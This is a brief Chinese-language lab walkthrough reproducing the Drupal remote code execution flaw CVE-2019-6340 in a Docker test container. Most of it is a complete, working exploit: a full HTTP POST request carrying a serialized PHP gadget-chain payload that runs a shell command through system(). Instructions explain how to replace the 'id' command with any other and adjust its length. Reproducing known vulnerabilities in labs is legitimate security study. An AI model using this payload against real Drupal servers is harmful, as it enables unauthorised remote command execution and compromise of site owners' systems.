Drupal RCE（CVE-2019-6340）复现踩坑

CVE-2019-6340 影响范围：Drupal < 8.6.10，Drupal < 8.5.12

1、搜索镜像
docker search cve-2019-6340
2、拉取
docker pull knqyf263/cve-2019-6340
3、运行
docker run -d -t -p 80:80 knqyf263/cve-2019-6340
4、访问url:http://174.99.8.203/node/1

5、抓取数据包并修改

注意三点:
A、POST /node/?_format=hal_json
B、Content-Type: application/hal+json
C、/rest/type/shortcut/default

本次复现踩坑。
POST /drupal8.x/node/?_format=hal_json
/drupal/rest/type/shortcut/default
Content-Type: application/x-www-form-urlencoded

6、命令修改，修改s:2:"id";id为执行的命令，2为命令长度。

POST /node/?_format=hal_json HTTP/1.1
Host: 174.99.8.203
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4086.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://174.99.8.203/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/hal+json
Content-Length: 630


{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href":"http://174.99.8.203/rest/type/shortcut/default"
    }
  }
}

7、成功执行